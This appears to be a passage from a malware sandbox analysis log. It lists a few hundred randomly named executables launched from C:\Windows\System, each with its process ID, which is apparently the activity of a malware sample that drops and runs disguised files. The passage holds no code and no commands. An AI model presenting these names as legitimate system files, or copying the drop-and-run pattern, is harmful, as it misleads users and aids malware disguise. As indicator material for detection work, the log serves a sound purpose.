- C:\Windows\System\iwUJRBY.exe
  C:\Windows\System\iwUJRBY.exe
  2⤵
  PID:7760
- C:\Windows\System\XCziBkV.exe
  C:\Windows\System\XCziBkV.exe
  2⤵
  PID:7824
- C:\Windows\System\xOoKsmZ.exe
  C:\Windows\System\xOoKsmZ.exe
  2⤵
  PID:7868
- C:\Windows\System\mAGVmdn.exe
  C:\Windows\System\mAGVmdn.exe
  2⤵
  PID:7888
- C:\Windows\System\IMxrXMS.exe
  C:\Windows\System\IMxrXMS.exe
  2⤵
  PID:8056
- C:\Windows\System\HOHPllo.exe
  C:\Windows\System\HOHPllo.exe
  2⤵
  PID:8108
- C:\Windows\System\UHQiNgT.exe
  C:\Windows\System\UHQiNgT.exe
  2⤵
  PID:8136
- C:\Windows\System\HLrjxsZ.exe
  C:\Windows\System\HLrjxsZ.exe
  2⤵
  PID:7164
- C:\Windows\System\xitChqE.exe
  C:\Windows\System\xitChqE.exe
  2⤵
  PID:7308
- C:\Windows\System\ovWTcpy.exe
  C:\Windows\System\ovWTcpy.exe
  2⤵
  PID:7444
- C:\Windows\System\hVNCGXR.exe
  C:\Windows\System\hVNCGXR.exe
  2⤵
  PID:7460
- C:\Windows\System\opLzxHY.exe
  C:\Windows\System\opLzxHY.exe
  2⤵
  PID:7672
- C:\Windows\System\cvCsKKD.exe
  C:\Windows\System\cvCsKKD.exe
  2⤵
  PID:7804
- C:\Windows\System\poNamRN.exe
  C:\Windows\System\poNamRN.exe
  2⤵
  PID:7948
- C:\Windows\System\azdOWVx.exe
  C:\Windows\System\azdOWVx.exe
  2⤵
  PID:7908
- C:\Windows\System\gObhrGN.exe
  C:\Windows\System\gObhrGN.exe
  2⤵
  PID:8016
- C:\Windows\System\kdIIwod.exe
  C:\Windows\System\kdIIwod.exe
  2⤵
  PID:8208
- C:\Windows\System\vTcwBlq.exe
  C:\Windows\System\vTcwBlq.exe
  2⤵
  PID:8224
- C:\Windows\System\oasaUpu.exe
  C:\Windows\System\oasaUpu.exe
  2⤵
  PID:8240
- C:\Windows\System\xKGzOXj.exe
  C:\Windows\System\xKGzOXj.exe
  2⤵
  PID:8260
- C:\Windows\System\qamSpUI.exe
  C:\Windows\System\qamSpUI.exe
  2⤵
  PID:8332
- C:\Windows\System\HyQvwDG.exe
  C:\Windows\System\HyQvwDG.exe
  2⤵
  PID:8352
- C:\Windows\System\FDwWGgz.exe
  C:\Windows\System\FDwWGgz.exe
  2⤵
  PID:8368
- C:\Windows\System\kSuAzPi.exe
  C:\Windows\System\kSuAzPi.exe
  2⤵
  PID:8384
- C:\Windows\System\lMpNsBd.exe
  C:\Windows\System\lMpNsBd.exe
  2⤵
  PID:8400
- C:\Windows\System\oYTxqQV.exe
  C:\Windows\System\oYTxqQV.exe
  2⤵
  PID:8420
- C:\Windows\System\ryPsFAr.exe
  C:\Windows\System\ryPsFAr.exe
  2⤵
  PID:8440
- C:\Windows\System\KPKrweW.exe
  C:\Windows\System\KPKrweW.exe
  2⤵
  PID:8464
- C:\Windows\System\iFXUEMR.exe
  C:\Windows\System\iFXUEMR.exe
  2⤵
  PID:8484
- C:\Windows\System\dcDgCdA.exe
  C:\Windows\System\dcDgCdA.exe
  2⤵
  PID:8584
- C:\Windows\System\cbduygD.exe
  C:\Windows\System\cbduygD.exe
  2⤵
  PID:8688
- C:\Windows\System\BqzhADe.exe
  C:\Windows\System\BqzhADe.exe
  2⤵
  PID:8724
- C:\Windows\System\MnDVEej.exe
  C:\Windows\System\MnDVEej.exe
  2⤵
  PID:8752
- C:\Windows\System\ToitIyt.exe
  C:\Windows\System\ToitIyt.exe
  2⤵
  PID:8768
- C:\Windows\System\zugMJxk.exe
  C:\Windows\System\zugMJxk.exe
  2⤵
  PID:8788
- C:\Windows\System\xkjwuRI.exe
  C:\Windows\System\xkjwuRI.exe
  2⤵
  PID:8804
- C:\Windows\System\SekERiH.exe
  C:\Windows\System\SekERiH.exe
  2⤵
  PID:8832
- C:\Windows\System\uDRjGgC.exe
  C:\Windows\System\uDRjGgC.exe
  2⤵
  PID:8852
- C:\Windows\System\wNSzLDm.exe
  C:\Windows\System\wNSzLDm.exe
  2⤵
  PID:8880
- C:\Windows\System\mNpaUcg.exe
  C:\Windows\System\mNpaUcg.exe
  2⤵
  PID:8900
- C:\Windows\System\orvxsbn.exe
  C:\Windows\System\orvxsbn.exe
  2⤵
  PID:8948
- C:\Windows\System\CdZrmxJ.exe
  C:\Windows\System\CdZrmxJ.exe
  2⤵
  PID:9000
- C:\Windows\System\JIYZigh.exe
  C:\Windows\System\JIYZigh.exe
  2⤵
  PID:9024
- C:\Windows\System\ZrmimWb.exe
  C:\Windows\System\ZrmimWb.exe
  2⤵
  PID:9064
- C:\Windows\System\UTyiDyZ.exe
  C:\Windows\System\UTyiDyZ.exe
  2⤵
  PID:9084
- C:\Windows\System\BGsfNSw.exe
  C:\Windows\System\BGsfNSw.exe
  2⤵
  PID:9104
- C:\Windows\System\GkRyopW.exe
  C:\Windows\System\GkRyopW.exe
  2⤵
  PID:9128
- C:\Windows\System\XFmXwpL.exe
  C:\Windows\System\XFmXwpL.exe
  2⤵
  PID:9164
- C:\Windows\System\LXuUTmo.exe
  C:\Windows\System\LXuUTmo.exe
  2⤵
  PID:9204
- C:\Windows\System\saHcomz.exe
  C:\Windows\System\saHcomz.exe
  2⤵
  PID:7708
- C:\Windows\System\PHVkxIr.exe
  C:\Windows\System\PHVkxIr.exe
  2⤵
  PID:7752
- C:\Windows\System\NlZKbhs.exe
  C:\Windows\System\NlZKbhs.exe
  2⤵
  PID:7596
- C:\Windows\System\SsaaBBb.exe
  C:\Windows\System\SsaaBBb.exe
  2⤵
  PID:8152
- C:\Windows\System\dIMRwqv.exe
  C:\Windows\System\dIMRwqv.exe
  2⤵
  PID:8216
- C:\Windows\System\sfKLXcr.exe
  C:\Windows\System\sfKLXcr.exe
  2⤵
  PID:8280
- C:\Windows\System\lCSwgrP.exe
  C:\Windows\System\lCSwgrP.exe
  2⤵
  PID:8376
- C:\Windows\System\UpQMOsm.exe
  C:\Windows\System\UpQMOsm.exe
  2⤵
  PID:8428
- C:\Windows\System\lwdVTFL.exe
  C:\Windows\System\lwdVTFL.exe
  2⤵
  PID:8596
- C:\Windows\System\RKrLCsW.exe
  C:\Windows\System\RKrLCsW.exe
  2⤵
  PID:8560
- C:\Windows\System\isVesar.exe
  C:\Windows\System\isVesar.exe
  2⤵
  PID:8716
- C:\Windows\System\shGgPFB.exe
  C:\Windows\System\shGgPFB.exe
  2⤵
  PID:8748
- C:\Windows\System\xtrVFgh.exe
  C:\Windows\System\xtrVFgh.exe
  2⤵
  PID:8800
- C:\Windows\System\bAcaFyx.exe
  C:\Windows\System\bAcaFyx.exe
  2⤵
  PID:8840
- C:\Windows\System\utuSENp.exe
  C:\Windows\System\utuSENp.exe
  2⤵
  PID:8892
- C:\Windows\System\eAQiUXr.exe
  C:\Windows\System\eAQiUXr.exe
  2⤵
  PID:8924
- C:\Windows\System\ahemkjR.exe
  C:\Windows\System\ahemkjR.exe
  2⤵
  PID:8988
- C:\Windows\System\FvotNnV.exe
  C:\Windows\System\FvotNnV.exe
  2⤵
  PID:9120
- C:\Windows\System\OyhvfPL.exe
  C:\Windows\System\OyhvfPL.exe
  2⤵
  PID:8060
- C:\Windows\System\yBfhTfq.exe
  C:\Windows\System\yBfhTfq.exe
  2⤵
  PID:7820
- C:\Windows\System\MafPuHm.exe
  C:\Windows\System\MafPuHm.exe
  2⤵
  PID:8256
- C:\Windows\System\FsLyRXO.exe
  C:\Windows\System\FsLyRXO.exe
  2⤵
  PID:8364
- C:\Windows\System\FbxqcYT.exe
  C:\Windows\System\FbxqcYT.exe
  2⤵
  PID:8520
- C:\Windows\System\VBJFzlT.exe
  C:\Windows\System\VBJFzlT.exe
  2⤵
  PID:8644
- C:\Windows\System\TrihaHU.exe
  C:\Windows\System\TrihaHU.exe
  2⤵
  PID:8820
- C:\Windows\System\IksXAzd.exe
  C:\Windows\System\IksXAzd.exe
  2⤵
  PID:8956
- C:\Windows\System\bqwncDY.exe
  C:\Windows\System\bqwncDY.exe
  2⤵
  PID:9116
- C:\Windows\System\CfgSpyS.exe
  C:\Windows\System\CfgSpyS.exe
  2⤵
  PID:9192
- C:\Windows\System\HUmZAEN.exe
  C:\Windows\System\HUmZAEN.exe
  2⤵
  PID:8480
- C:\Windows\System\mtPikAM.exe
  C:\Windows\System\mtPikAM.exe
  2⤵
  PID:8680
- C:\Windows\System\sMZKElz.exe
  C:\Windows\System\sMZKElz.exe
  2⤵
  PID:9096
- C:\Windows\System\ptMLryy.exe
  C:\Windows\System\ptMLryy.exe
  2⤵
  PID:9212
- C:\Windows\System\WnBeiBK.exe
  C:\Windows\System\WnBeiBK.exe
  2⤵
  PID:9272
- C:\Windows\System\VMmePLj.exe
  C:\Windows\System\VMmePLj.exe
  2⤵
  PID:9292
- C:\Windows\System\OvEWfyO.exe
  C:\Windows\System\OvEWfyO.exe
  2⤵
  PID:9328
- C:\Windows\System\zPlVTbn.exe
  C:\Windows\System\zPlVTbn.exe
  2⤵
  PID:9344
- C:\Windows\System\BOQVJqj.exe
  C:\Windows\System\BOQVJqj.exe
  2⤵
  PID:9364
- C:\Windows\System\OaKXdHX.exe
  C:\Windows\System\OaKXdHX.exe
  2⤵
  PID:9392
- C:\Windows\System\jZVLrdH.exe
  C:\Windows\System\jZVLrdH.exe
  2⤵
  PID:9436
- C:\Windows\System\zEJnHCb.exe
  C:\Windows\System\zEJnHCb.exe
  2⤵
  PID:9456
- C:\Windows\System\UCCZQsw.exe
  C:\Windows\System\UCCZQsw.exe
  2⤵
  PID:9480
- C:\Windows\System\gxTKQYr.exe
  C:\Windows\System\gxTKQYr.exe
  2⤵
  PID:9500
- C:\Windows\System\dPFsitn.exe
  C:\Windows\System\dPFsitn.exe
  2⤵
  PID:9524
- C:\Windows\System\IjQsqdc.exe
  C:\Windows\System\IjQsqdc.exe
  2⤵
  PID:9544
- C:\Windows\System\JJAZZHz.exe
  C:\Windows\System\JJAZZHz.exe
  2⤵
  PID:9568
- C:\Windows\System\zXgeyGq.exe
  C:\Windows\System\zXgeyGq.exe
  2⤵
  PID:9644
- C:\Windows\System\iZLlAYy.exe
  C:\Windows\System\iZLlAYy.exe
  2⤵
  PID:9672
- C:\Windows\System\YBoAkjg.exe
  C:\Windows\System\YBoAkjg.exe
  2⤵
  PID:9688
- C:\Windows\System\UKzriRc.exe
  C:\Windows\System\UKzriRc.exe
  2⤵
  PID:9720
- C:\Windows\System\BrTlYmE.exe
  C:\Windows\System\BrTlYmE.exe
  2⤵
  PID:9740
- C:\Windows\System\xorTYHa.exe
  C:\Windows\System\xorTYHa.exe
  2⤵
  PID:9764
- C:\Windows\System\fsueqEg.exe
  C:\Windows\System\fsueqEg.exe
  2⤵
  PID:9792
- C:\Windows\System\TJPQhVT.exe
  C:\Windows\System\TJPQhVT.exe
  2⤵
  PID:9816
- C:\Windows\System\fOMqrsR.exe
  C:\Windows\System\fOMqrsR.exe
  2⤵
  PID:9836
- C:\Windows\System\mlmWmfh.exe
  C:\Windows\System\mlmWmfh.exe
  2⤵
  PID:9864
- C:\Windows\System\zjOXSQO.exe
  C:\Windows\System\zjOXSQO.exe
  2⤵
  PID:9892
- C:\Windows\System\FWJhVxM.exe
  C:\Windows\System\FWJhVxM.exe
  2⤵
  PID:9916
- C:\Windows\System\zZXGBme.exe
  C:\Windows\System\zZXGBme.exe
  2⤵
  PID:9968
- C:\Windows\System\TclRBoD.exe
  C:\Windows\System\TclRBoD.exe
  2⤵
  PID:10004
- C:\Windows\System\nrfGgbK.exe
  C:\Windows\System\nrfGgbK.exe
  2⤵
  PID:10032
- C:\Windows\System\OWIVfDo.exe
  C:\Windows\System\OWIVfDo.exe
  2⤵
  PID:10052
- C:\Windows\System\nJYLkku.exe
  C:\Windows\System\nJYLkku.exe
  2⤵
  PID:10084
- C:\Windows\System\apbIVvC.exe
  C:\Windows\System\apbIVvC.exe
  2⤵
  PID:10104
- C:\Windows\System\RFywEsC.exe
  C:\Windows\System\RFywEsC.exe
  2⤵
  PID:10124
- C:\Windows\System\dxaMAWH.exe
  C:\Windows\System\dxaMAWH.exe
  2⤵
  PID:10144
- C:\Windows\System\NFluKCW.exe
  C:\Windows\System\NFluKCW.exe
  2⤵
  PID:10160
- C:\Windows\System\HVEDSbx.exe
  C:\Windows\System\HVEDSbx.exe
  2⤵
  PID:10184
- C:\Windows\System\nuBZXSP.exe
  C:\Windows\System\nuBZXSP.exe
  2⤵
  PID:10228
- C:\Windows\System\LWZsWHZ.exe
  C:\Windows\System\LWZsWHZ.exe
  2⤵
  PID:8172
- C:\Windows\System\jvnzNwv.exe
  C:\Windows\System\jvnzNwv.exe
  2⤵
  PID:9252
- C:\Windows\System\GReQeKz.exe
  C:\Windows\System\GReQeKz.exe
  2⤵
  PID:9288
- C:\Windows\System\FKkJxGU.exe
  C:\Windows\System\FKkJxGU.exe
  2⤵
  PID:9360
- C:\Windows\System\JjAppvc.exe
  C:\Windows\System\JjAppvc.exe
  2⤵
  PID:9424
- C:\Windows\System\iKvsyjX.exe
  C:\Windows\System\iKvsyjX.exe
  2⤵
  PID:9448
- C:\Windows\System\oUnNeTM.exe
  C:\Windows\System\oUnNeTM.exe
  2⤵
  PID:9512
- C:\Windows\System\sOZiToX.exe
  C:\Windows\System\sOZiToX.exe
  2⤵
  PID:9660
- C:\Windows\System\oSzhDPM.exe
  C:\Windows\System\oSzhDPM.exe
  2⤵
  PID:9728
- C:\Windows\System\KflPfAe.exe
  C:\Windows\System\KflPfAe.exe
  2⤵
  PID:9828
- C:\Windows\System\qqLapwf.exe
  C:\Windows\System\qqLapwf.exe
  2⤵
  PID:9908
- C:\Windows\System\vhDaKLC.exe
  C:\Windows\System\vhDaKLC.exe
  2⤵
  PID:9996
- C:\Windows\System\NeZWNiL.exe
  C:\Windows\System\NeZWNiL.exe
  2⤵
  PID:10096
- C:\Windows\System\BQMPTjj.exe
  C:\Windows\System\BQMPTjj.exe
  2⤵
  PID:10140
- C:\Windows\System\vkRiLoY.exe
  C:\Windows\System\vkRiLoY.exe
  2⤵
  PID:10224
- C:\Windows\System\blFuoPg.exe
  C:\Windows\System\blFuoPg.exe
  2⤵
  PID:9244
- C:\Windows\System\iXhqDDd.exe
  C:\Windows\System\iXhqDDd.exe
  2⤵
  PID:9564
- C:\Windows\System\XVVcAxC.exe
  C:\Windows\System\XVVcAxC.exe
  2⤵
  PID:9388
- C:\Windows\System\tDDAtXz.exe
  C:\Windows\System\tDDAtXz.exe
  2⤵
  PID:9596
- C:\Windows\System\mcDSZrf.exe
  C:\Windows\System\mcDSZrf.exe
  2⤵
  PID:9808
- C:\Windows\System\uiaOiJQ.exe
  C:\Windows\System\uiaOiJQ.exe
  2⤵
  PID:9884
- C:\Windows\System\hCcbUzo.exe
  C:\Windows\System\hCcbUzo.exe
  2⤵
  PID:10024
- C:\Windows\System\XjWNyZY.exe
  C:\Windows\System\XjWNyZY.exe
  2⤵
  PID:10220
- C:\Windows\System\DrPHtMW.exe
  C:\Windows\System\DrPHtMW.exe
  2⤵
  PID:9260
- C:\Windows\System\yUhuRLp.exe
  C:\Windows\System\yUhuRLp.exe
  2⤵
  PID:9376
- C:\Windows\System\YIzZGmm.exe
  C:\Windows\System\YIzZGmm.exe
  2⤵
  PID:10100
- C:\Windows\System\rsCuasI.exe
  C:\Windows\System\rsCuasI.exe
  2⤵
  PID:9468
- C:\Windows\System\XSiAVIK.exe
  C:\Windows\System\XSiAVIK.exe
  2⤵
  PID:10272
- C:\Windows\System\lBCQtps.exe
  C:\Windows\System\lBCQtps.exe
  2⤵
  PID:10292
- C:\Windows\System\YJgCLxW.exe
  C:\Windows\System\YJgCLxW.exe
  2⤵
  PID:10320
- C:\Windows\System\kKMsfws.exe
  C:\Windows\System\kKMsfws.exe
  2⤵
  PID:10348
- C:\Windows\System\quzfdXc.exe
  C:\Windows\System\quzfdXc.exe
  2⤵
  PID:10380
- C:\Windows\System\sLmBxPD.exe
  C:\Windows\System\sLmBxPD.exe
  2⤵
  PID:10404
- C:\Windows\System\EKKRmYT.exe
  C:\Windows\System\EKKRmYT.exe
  2⤵
  PID:10436
- C:\Windows\System\SePpUQd.exe
  C:\Windows\System\SePpUQd.exe
  2⤵
  PID:10468
- C:\Windows\System\SRYCxpO.exe
  C:\Windows\System\SRYCxpO.exe
  2⤵
  PID:10492
- C:\Windows\System\DCNFvpV.exe
  C:\Windows\System\DCNFvpV.exe
  2⤵
  PID:10516
- C:\Windows\System\dOUjphl.exe
  C:\Windows\System\dOUjphl.exe
  2⤵
  PID:10560
- C:\Windows\System\dseCXHY.exe
  C:\Windows\System\dseCXHY.exe
  2⤵
  PID:10584
- C:\Windows\System\YKJXYct.exe
  C:\Windows\System\YKJXYct.exe
  2⤵
  PID:10604
- C:\Windows\System\amAwLXS.exe
  C:\Windows\System\amAwLXS.exe
  2⤵
  PID:10632
- C:\Windows\System\YEKbhTd.exe
  C:\Windows\System\YEKbhTd.exe
  2⤵
  PID:10652
- C:\Windows\System\WfkYBCE.exe
  C:\Windows\System\WfkYBCE.exe
  2⤵
  PID:10700
- C:\Windows\System\VYsAPPh.exe
  C:\Windows\System\VYsAPPh.exe
  2⤵
  PID:10732
- C:\Windows\System\MzFluMx.exe
  C:\Windows\System\MzFluMx.exe
  2⤵
  PID:10752
- C:\Windows\System\SuhhBnh.exe
  C:\Windows\System\SuhhBnh.exe
  2⤵
  PID:10772
- C:\Windows\System\PtosGnt.exe
  C:\Windows\System\PtosGnt.exe
  2⤵
  PID:10800
- C:\Windows\System\UJcjvpL.exe
  C:\Windows\System\UJcjvpL.exe
  2⤵
  PID:10828
- C:\Windows\System\BDWDbNP.exe
  C:\Windows\System\BDWDbNP.exe
  2⤵
  PID:10868
- C:\Windows\System\YfpjZXc.exe
  C:\Windows\System\YfpjZXc.exe
  2⤵
  PID:10888
- C:\Windows\System\IEeWdsU.exe
  C:\Windows\System\IEeWdsU.exe
  2⤵
  PID:10912
- C:\Windows\System\yGjTPvW.exe
  C:\Windows\System\yGjTPvW.exe
  2⤵
  PID:10940
- C:\Windows\System\SaBKpiF.exe
  C:\Windows\System\SaBKpiF.exe
  2⤵
  PID:10956
- C:\Windows\System\IgHCNZO.exe
  C:\Windows\System\IgHCNZO.exe
  2⤵
  PID:10996
- C:\Windows\System\FujuTzn.exe
  C:\Windows\System\FujuTzn.exe
  2⤵
  PID:11020
- C:\Windows\System\GiptnNZ.exe
  C:\Windows\System\GiptnNZ.exe
  2⤵
  PID:11040
- C:\Windows\System\UOCxjzt.exe
  C:\Windows\System\UOCxjzt.exe
  2⤵
  PID:11076
- C:\Windows\System\JKNfvFT.exe
  C:\Windows\System\JKNfvFT.exe
  2⤵
  PID:11116
- C:\Windows\System\VnREbpE.exe
  C:\Windows\System\VnREbpE.exe
  2⤵
  PID:11136
- C:\Windows\System\HtZCPpl.exe
  C:\Windows\System\HtZCPpl.exe
  2⤵
  PID:11164
- C:\Windows\System\pCdLyak.exe
  C:\Windows\System\pCdLyak.exe
  2⤵
  PID:11184
- C:\Windows\System\OFpERwU.exe
  C:\Windows\System\OFpERwU.exe
  2⤵
  PID:11200
- C:\Windows\System\aCqxvEt.exe
  C:\Windows\System\aCqxvEt.exe
  2⤵
  PID:11224
- C:\Windows\System\OCEPxQq.exe
  C:\Windows\System\OCEPxQq.exe
  2⤵
  PID:11244
- C:\Windows\System\rlMtUMk.exe
  C:\Windows\System\rlMtUMk.exe
  2⤵
  PID:9960
- C:\Windows\System\IYjsuPX.exe
  C:\Windows\System\IYjsuPX.exe
  2⤵
  PID:10340
- C:\Windows\System\OujgFxF.exe
  C:\Windows\System\OujgFxF.exe
  2⤵
  PID:10392
- C:\Windows\System\vHBfrzv.exe
  C:\Windows\System\vHBfrzv.exe
  2⤵
  PID:10416
- C:\Windows\System\UUHxVqu.exe
  C:\Windows\System\UUHxVqu.exe
  2⤵
  PID:10512
- C:\Windows\System\WZQujWG.exe
  C:\Windows\System\WZQujWG.exe
  2⤵
  PID:10580
- C:\Windows\System\ytLmenB.exe
  C:\Windows\System\ytLmenB.exe
  2⤵
  PID:10624
- C:\Windows\System\GFEnVyr.exe
  C:\Windows\System\GFEnVyr.exe
  2⤵
  PID:10744
- C:\Windows\System\MUKbUJI.exe
  C:\Windows\System\MUKbUJI.exe
  2⤵
  PID:10820
- C:\Windows\System\YevKAzz.exe
  C:\Windows\System\YevKAzz.exe
  2⤵
  PID:10860
- C:\Windows\System\ZynNnYW.exe
  C:\Windows\System\ZynNnYW.exe
  2⤵
  PID:10924
- C:\Windows\System\QmffrfB.exe
  C:\Windows\System\QmffrfB.exe
  2⤵
  PID:10992
- C:\Windows\System\LKhJXyq.exe
  C:\Windows\System\LKhJXyq.exe
  2⤵
  PID:11100
- C:\Windows\System\bycxGhg.exe
  C:\Windows\System\bycxGhg.exe
  2⤵
  PID:11144
- C:\Windows\System\tfwQagZ.exe
  C:\Windows\System\tfwQagZ.exe
  2⤵
  PID:11128
- C:\Windows\System\zrrbiDk.exe
  C:\Windows\System\zrrbiDk.exe
  2⤵
  PID:11220
- C:\Windows\System\dkSuyOD.exe
  C:\Windows\System\dkSuyOD.exe
  2⤵
  PID:10304
- C:\Windows\System\WaZTSdN.exe
  C:\Windows\System\WaZTSdN.exe
  2⤵
  PID:10388
- C:\Windows\System\xUmqjAF.exe
  C:\Windows\System\xUmqjAF.exe
  2⤵
  PID:10552
- C:\Windows\System\kxLdljX.exe
  C:\Windows\System\kxLdljX.exe
  2⤵
  PID:10816
- C:\Windows\System\XfbDPwG.exe
  C:\Windows\System\XfbDPwG.exe
  2⤵
  PID:11092
- C:\Windows\System\mOXjwoJ.exe
  C:\Windows\System\mOXjwoJ.exe
  2⤵
  PID:11176
- C:\Windows\System\kuzQsGw.exe
  C:\Windows\System\kuzQsGw.exe
  2⤵
  PID:11192
- C:\Windows\System\DsboraQ.exe
  C:\Windows\System\DsboraQ.exe
  2⤵
  PID:10500
- C:\Windows\System\WJOxtka.exe
  C:\Windows\System\WJOxtka.exe
  2⤵
  PID:10708
- C:\Windows\System\mndxqvO.exe
  C:\Windows\System\mndxqvO.exe
  2⤵
  PID:11048
- C:\Windows\System\lYAmlMr.exe
  C:\Windows\System\lYAmlMr.exe
  2⤵
  PID:10316
- C:\Windows\System\eImWSAL.exe
  C:\Windows\System\eImWSAL.exe
  2⤵
  PID:11304
- C:\Windows\System\mxcJiKl.exe
  C:\Windows\System\mxcJiKl.exe
  2⤵
  PID:11320
- C:\Windows\System\GQCiovm.exe
  C:\Windows\System\GQCiovm.exe
  2⤵
  PID:11344
- C:\Windows\System\MZSyacv.exe
  C:\Windows\System\MZSyacv.exe
  2⤵
  PID:11364
- C:\Windows\System\JwiMobM.exe
  C:\Windows\System\JwiMobM.exe
  2⤵
  PID:11384
- C:\Windows\System\AgCXIOc.exe
  C:\Windows\System\AgCXIOc.exe
  2⤵
  PID:11404
- C:\Windows\System\jrEVDZn.exe
  C:\Windows\System\jrEVDZn.exe
  2⤵
  PID:11436
- C:\Windows\System\PPyPqoO.exe
  C:\Windows\System\PPyPqoO.exe
  2⤵
  PID:11476
- C:\Windows\System\bHYPDjA.exe
  C:\Windows\System\bHYPDjA.exe
  2⤵
  PID:11516
- C:\Windows\System\yFJlDnl.exe
  C:\Windows\System\yFJlDnl.exe
  2⤵
  PID:11532
- C:\Windows\System\QaoASKy.exe
  C:\Windows\System\QaoASKy.exe
  2⤵
  PID:11556
- C:\Windows\System\PdFWHsF.exe
  C:\Windows\System\PdFWHsF.exe
  2⤵
  PID:11592
- C:\Windows\System\YBqiUDI.exe
  C:\Windows\System\YBqiUDI.exe
  2⤵
  PID:11624
- C:\Windows\System\VkZpoFV.exe
  C:\Windows\System\VkZpoFV.exe
  2⤵
  PID:11644
- C:\Windows\System\tBFLMmk.exe
  C:\Windows\System\tBFLMmk.exe
  2⤵
  PID:11692
- C:\Windows\System\wQRTHAs.exe
  C:\Windows\System\wQRTHAs.exe
  2⤵
  PID:11724
- C:\Windows\System\kMNOaie.exe
  C:\Windows\System\kMNOaie.exe
  2⤵
  PID:11740
- C:\Windows\System\UmeSGgE.exe
  C:\Windows\System\UmeSGgE.exe
  2⤵
  PID:11796
- C:\Windows\System\CYHAXRo.exe
  C:\Windows\System\CYHAXRo.exe
  2⤵
  PID:11820
- C:\Windows\System\ymsmvGg.exe
  C:\Windows\System\ymsmvGg.exe
  2⤵
  PID:11840
- C:\Windows\System\gcaXKoY.exe
  C:\Windows\System\gcaXKoY.exe
  2⤵
  PID:11864
- C:\Windows\System\EXoAMPw.exe
  C:\Windows\System\EXoAMPw.exe
  2⤵
  PID:11888
- C:\Windows\System\hZIxTgo.exe
  C:\Windows\System\hZIxTgo.exe
  2⤵
  PID:11908
- C:\Windows\System\eMzWpYZ.exe
  C:\Windows\System\eMzWpYZ.exe
  2⤵
  PID:11956
- C:\Windows\System\TfaoEwJ.exe
  C:\Windows\System\TfaoEwJ.exe
  2⤵
  PID:11980
- C:\Windows\System\ckKGqUo.exe
  C:\Windows\System\ckKGqUo.exe
  2⤵
  PID:12000
- C:\Windows\System\sRKWuBY.exe
  C:\Windows\System\sRKWuBY.exe
  2⤵
  PID:12016
- C:\Windows\System\NpjcQCj.exe
  C:\Windows\System\NpjcQCj.exe
  2⤵
  PID:12056
- C:\Windows\System\YTmkXzn.exe
  C:\Windows\System\YTmkXzn.exe
  2⤵
  PID:12088
- C:\Windows\System\GXaavVd.exe
  C:\Windows\System\GXaavVd.exe
  2⤵
  PID:12108
- C:\Windows\System\cYUPVcx.exe
  C:\Windows\System\cYUPVcx.exe
  2⤵
  PID:12132
- C:\Windows\System\GvvwnHI.exe
  C:\Windows\System\GvvwnHI.exe
  2⤵
  PID:12160
- C:\Windows\System\bgSxVUU.exe
  C:\Windows\System\bgSxVUU.exe
  2⤵
  PID:12180
- C:\Windows\System\smNSRwz.exe
  C:\Windows\System\smNSRwz.exe
  2⤵
  PID:12200
- C:\Windows\System\pXZNRHU.exe
  C:\Windows\System\pXZNRHU.exe
  2⤵
  PID:12232
- C:\Windows\System\yXVcoUS.exe
  C:\Windows\System\yXVcoUS.exe
  2⤵
  PID:12276
- C:\Windows\System\wyfMRHi.exe
  C:\Windows\System\wyfMRHi.exe
  2⤵
  PID:11272
- C:\Windows\System\sIBnJbP.exe
  C:\Windows\System\sIBnJbP.exe
  2⤵
  PID:11328
- C:\Windows\System\CpYSiVf.exe
  C:\Windows\System\CpYSiVf.exe
  2⤵
  PID:11380
- C:\Windows\System\JdDoqpR.exe
  C:\Windows\System\JdDoqpR.exe
  2⤵
  PID:11524
- C:\Windows\System\uglbgKa.exe
  C:\Windows\System\uglbgKa.exe
  2⤵
  PID:11636
- C:\Windows\System\ZYilVmm.exe
  C:\Windows\System\ZYilVmm.exe
  2⤵
  PID:11684
- C:\Windows\System\ZycGOGD.exe
  C:\Windows\System\ZycGOGD.exe
  2⤵
  PID:11768
- C:\Windows\System\inZliZC.exe
  C:\Windows\System\inZliZC.exe
  2⤵
  PID:11828
- C:\Windows\System\MHDgHOZ.exe
  C:\Windows\System\MHDgHOZ.exe
  2⤵
  PID:11872
- C:\Windows\System\ZiWXNZn.exe
  C:\Windows\System\ZiWXNZn.exe
  2⤵
  PID:11928
- C:\Windows\System\mKwqkCM.exe
  C:\Windows\System\mKwqkCM.exe
  2⤵
  PID:11996
- C:\Windows\System\sUYoOhz.exe
  C:\Windows\System\sUYoOhz.exe
  2⤵
  PID:12044
- C:\Windows\System\jUOGMEs.exe
  C:\Windows\System\jUOGMEs.exe
  2⤵
  PID:12140
- C:\Windows\System\oxYUyft.exe
  C:\Windows\System\oxYUyft.exe
  2⤵
  PID:12172
- C:\Windows\System\JgVDyzq.exe
  C:\Windows\System\JgVDyzq.exe
  2⤵
  PID:12196
- C:\Windows\System\ZatXVei.exe
  C:\Windows\System\ZatXVei.exe
  2⤵
  PID:11300
- C:\Windows\System\eIhzWkK.exe
  C:\Windows\System\eIhzWkK.exe
  2⤵
  PID:3332
- C:\Windows\System\kNsXFIS.exe
  C:\Windows\System\kNsXFIS.exe
  2⤵
  PID:11548
- C:\Windows\System\iEWwTck.exe
  C:\Windows\System\iEWwTck.exe
  2⤵
  PID:11604
- C:\Windows\System\kAtjBFh.exe
  C:\Windows\System\kAtjBFh.exe
  2⤵
  PID:3684
- C:\Windows\System\LtFRpWC.exe
  C:\Windows\System\LtFRpWC.exe
  2⤵
  PID:116
- C:\Windows\System\gbvEVsS.exe
  C:\Windows\System\gbvEVsS.exe
  2⤵
  PID:11904
- C:\Windows\System\WVDbqas.exe
  C:\Windows\System\WVDbqas.exe
  2⤵
  PID:11972
- C:\Windows\System\TwCBwyc.exe
  C:\Windows\System\TwCBwyc.exe
  2⤵
  PID:12100
- C:\Windows\System\npGVNcl.exe
  C:\Windows\System\npGVNcl.exe
  2⤵
  PID:12272
- C:\Windows\System\QeRlwAi.exe
  C:\Windows\System\QeRlwAi.exe
  2⤵
  PID:11428
- C:\Windows\System\xbKWyed.exe
  C:\Windows\System\xbKWyed.exe
  2⤵
  PID:4808
- C:\Windows\System\qBGelxX.exe
  C:\Windows\System\qBGelxX.exe
  2⤵
  PID:11668
- C:\Windows\System\qesbmas.exe
  C:\Windows\System\qesbmas.exe
  2⤵
  PID:12084
- C:\Windows\System\PZBOTUP.exe
  C:\Windows\System\PZBOTUP.exe
  2⤵
  PID:11608
- C:\Windows\System\oaRpLaN.exe
  C:\Windows\System\oaRpLaN.exe
  2⤵
  PID:264
- C:\Windows\System\dlizATa.exe
  C:\Windows\System\dlizATa.exe
  2⤵
  PID:11876
